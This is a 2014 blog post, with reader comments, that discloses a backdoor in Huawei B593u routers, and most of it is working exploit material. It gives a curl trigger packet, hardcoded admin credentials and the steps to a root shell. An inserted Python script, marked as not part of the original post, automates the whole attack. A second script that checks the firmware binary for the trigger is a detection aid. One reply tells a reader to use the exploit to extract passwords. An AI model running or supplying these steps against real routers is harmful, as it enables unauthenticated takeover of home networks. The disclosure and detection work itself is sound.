Tuesday, August 19, 2014

Huapwn - Backdoor on your Huawei B593u

A public Huawei document I linked a couple of days ago mentioned a factory diagnostics tool called "Huawei deviceLocker V0.1" that grants access to a root shell on the router. I got curious about how this would actually work and concluded it must be something extremely simple and insecure; it IS Huawei after all. After some poking around in the /bin/web process I figured it out: it's all there in cleartext for anyone to read. The admin password is in Huawei's own docs, so that is not exactly a secret either. In case you didn't realize: no authentication is needed to trigger this. Protip: try to hide your backdoors a bit better next time.

# Send the magic packet that enables telnet. The request never gets a normal
# reply, so a timeout (curl exit code 28 after the 5 second limit) is the
# expected result.
curl -m5 \
    -d "switch=0&handshakeFlag=zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq" \
    http://192.168.1.1/portconfig.cgi

telnet 192.168.1.1
# If telnet says "connection refused", keep trying every few seconds; the
# daemon takes a moment to come up and it will work.
# If telnet just hangs and times out, the port is not open at all and there
# is no point retrying.
# login: admin
# pass:  HW4GCPE
# Type "shell" or "sh" at the prompt to drop to a root shell.
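The two steps above automated, as an added example that is not part of the original post: the script sends the same POST to portconfig.cgi and then polls TCP port 23, treating "connection refused" (the kernel answers with a RST, nothing is listening yet) as "keep waiting" and a connect timeout (no answer at all, port filtered) as "the backdoor did not fire", which is the distinction the comments above draw. The router address, URL, form fields, handshake value and credentials are taken from the post; the retry count and delay are arbitrary choices, and the probe function is injectable so the polling logic can be exercised without a router.

```python
"""Trigger the B593u telnet backdoor and poll for the port (added example)."""
import socket
import time
import urllib.error
import urllib.parse
import urllib.request

ROUTER = "192.168.1.1"      # router address used in the post
TELNET_PORT = 23
# Handshake value exactly as it appears in the post's curl command.
HANDSHAKE = "zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq"


def build_magic_body() -> bytes:
    """Form body of the 'magic packet': switch=0 plus the handshake flag."""
    return urllib.parse.urlencode({"switch": "0", "handshakeFlag": HANDSHAKE}).encode()


def send_magic_packet(host: str = ROUTER, timeout: float = 5.0) -> str:
    """POST to portconfig.cgi. The post notes a timeout is the expected
    outcome, so 'no response' is reported as a normal result, not an error."""
    req = urllib.request.Request(
        f"http://{host}/portconfig.cgi", data=build_magic_body(), method="POST"
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return f"http {resp.status}"
    except urllib.error.HTTPError as exc:
        return f"http {exc.code}"
    except (urllib.error.URLError, OSError) as exc:
        return f"no response ({exc.__class__.__name__})"


def probe_port(host: str, port: int, timeout: float = 3.0) -> str:
    """Classify one TCP connect: 'open', 'refused' (RST received),
    'timeout' (no answer, port filtered) or 'unreachable' (no route)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "refused"
    except (socket.timeout, TimeoutError):
        return "timeout"
    except OSError:
        return "unreachable"
    finally:
        sock.close()


def wait_for_telnet(host: str = ROUTER, port: int = TELNET_PORT, attempts: int = 10,
                    delay: float = 3.0, probe=probe_port) -> str:
    """Poll the telnet port after the magic packet.

    Only 'refused' is worth retrying: the stack is up but telnetd has not
    started listening yet. 'open' is success; 'timeout' or 'unreachable'
    means retrying with telnet is pointless, exactly as the post says."""
    state = "refused"
    for attempt in range(attempts):
        state = probe(host, port)
        if state != "refused":
            return state
        if attempt < attempts - 1:
            time.sleep(delay)   # assumed retry interval, a few seconds
    return state


if __name__ == "__main__":
    print("magic packet:", send_magic_packet())
    result = wait_for_telnet()
    print("telnet port:", result)
    if result == "open":
        print(f"now run: telnet {ROUTER}  (login admin / HW4GCPE, then 'shell')")
```

Run it on the LAN side of the router; a result of "timeout" after the POST means this build does not react to portconfig.cgi, which is the behaviour the post reports for the newer firmwares.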

To be fair, Huawei is at least trying, since this backdoor HAS been closed in recent builds. Not that I could find any public disclosure about this particular hole. The B593u is a rather common device (at least in Europe), and most operators still only distribute old firmware versions in which the hole is present.

Polkomtel SP103 and T-Mobile SP102/SP104/SP105 (the latest known firmwares for the B593U-12) ship a slightly different /bin/web binary than older builds. The newer versions still contain the same backdoor function, triggered by the same "handshake" string, but portconfig.cgi is no longer in the list of accepted URLs. It is not an actual CGI script: /bin/web simply holds a table of URLs and the internal function to run for each. That table has been edited either to remove this entry point or, worse, to hide it while still allowing the function to be triggered some other way.
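A quick way to tell which of those two cases a given /bin/web falls into, added here as an example and not part of the original post. It pulls printable strings out of the binary the way strings(1) does, lists the .cgi names (the URL table the paragraph describes) and reports whether the handshake string and a portconfig.cgi entry are both present. The two sample blobs are constructed stand-ins for an old and a newer build, not real firmware; that the table entries sit in the binary as plain ASCII is consistent with the post's "all there in cleartext" but is an assumption for any particular build.

```python
"""Inspect a /bin/web dump for the B593u backdoor strings (added example)."""
import re

# Handshake value from the post's curl command, as bytes.
HANDSHAKE = b"zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq"
BACKDOOR_URL = "portconfig.cgi"


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """strings(1)-style: runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def cgi_urls(blob: bytes) -> list:
    """Candidate URL-table entries: every string ending in '.cgi', sorted."""
    return sorted({s for s in extract_strings(blob) if s.endswith(".cgi")})


def assess_web_binary(blob: bytes) -> dict:
    """Report whether the trigger string and its entry point are both present.

    handshake + portconfig.cgi listed  -> old build, reachable as in the post
    handshake only                     -> function kept, entry point removed
                                          or renamed (the 'worse' case above)
    neither                            -> backdoor function not visible
    """
    urls = cgi_urls(blob)
    handshake_present = HANDSHAKE in blob
    portconfig_listed = any(u.endswith(BACKDOOR_URL) for u in urls)
    if handshake_present and portconfig_listed:
        verdict = "backdoor reachable via portconfig.cgi"
    elif handshake_present:
        verdict = "handshake present, portconfig.cgi not listed: trigger removed or renamed"
    else:
        verdict = "handshake string absent"
    return {
        "handshake_present": handshake_present,
        "portconfig_listed": portconfig_listed,
        "cgi_urls": urls,
        "verdict": verdict,
    }


def assess_file(path: str) -> dict:
    """Convenience wrapper for a /bin/web pulled from a firmware image or device."""
    with open(path, "rb") as fh:
        return assess_web_binary(fh.read())


# Constructed sample blobs, NOT real firmware: NUL-separated strings mimicking
# an older build (entry point listed) and a newer one (entry point dropped).
OLD_BUILD = b"\x00".join([b"\x7fELF", b"/index.cgi", b"/login.cgi", b"/portconfig.cgi",
                          b"handshakeFlag", HANDSHAKE, b"switch"]) + b"\x00"
NEW_BUILD = b"\x00".join([b"\x7fELF", b"/index.cgi", b"/login.cgi",
                          b"handshakeFlag", HANDSHAKE, b"switch"]) + b"\x00"

if __name__ == "__main__":
    for name, blob in (("old build", OLD_BUILD), ("new build", NEW_BUILD)):
        report = assess_web_binary(blob)
        print(f"{name}: {report['verdict']}  urls={report['cgi_urls']}")
```

Point assess_file at the real binary; a "handshake present, portconfig.cgi not listed" verdict is the situation described for the SP102 to SP105 builds, and the printed URL list is where to look for whatever replaced the old entry point.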

So unless you're willing to take the risk of flashing unsupported firmware customized for another operator, your router is just waiting to be hacked. Permanently hacked, that is.

Combined with the persistent hack I posted a few hours ago, a malicious attacker could seriously own the device, and not even a factory reset paired with a full firmware upgrade would help you. Or have you seen many anti-rootkit tools for routers lately?


5 comments:

  1. Hi, I have a B593U-12 modem, but I cannot log in with the default password admin; I tried resetting to factory settings and still cannot log in using the password admin. Anywhere I can get the password to log in? Thank you so much. My mail: hocklonggoh@gmail.com

    1. If you're running older firmware where the exploit described above works, just use it: log in to the root shell, dump the config partition, and the password is right there in cleartext.

  2. Hi! Do you mind sharing "Huawei deviceLocker V0.1"? It is writeConfig.exe, I think, right? I would like to check with my provider because this is a major issue.
    Cheers!

    1. Hi. No idea where to get that exe. The information on how this backdoor works came from observing the binaries present on the router and from trial and error. The tip that such a backdoor must be somewhere came from that Huawei document referring to the deviceLocker program.

    2. So that magic packet is always the same one? Because I tried testing against my 593-22 and it's not working at all. Cheers, and great work!

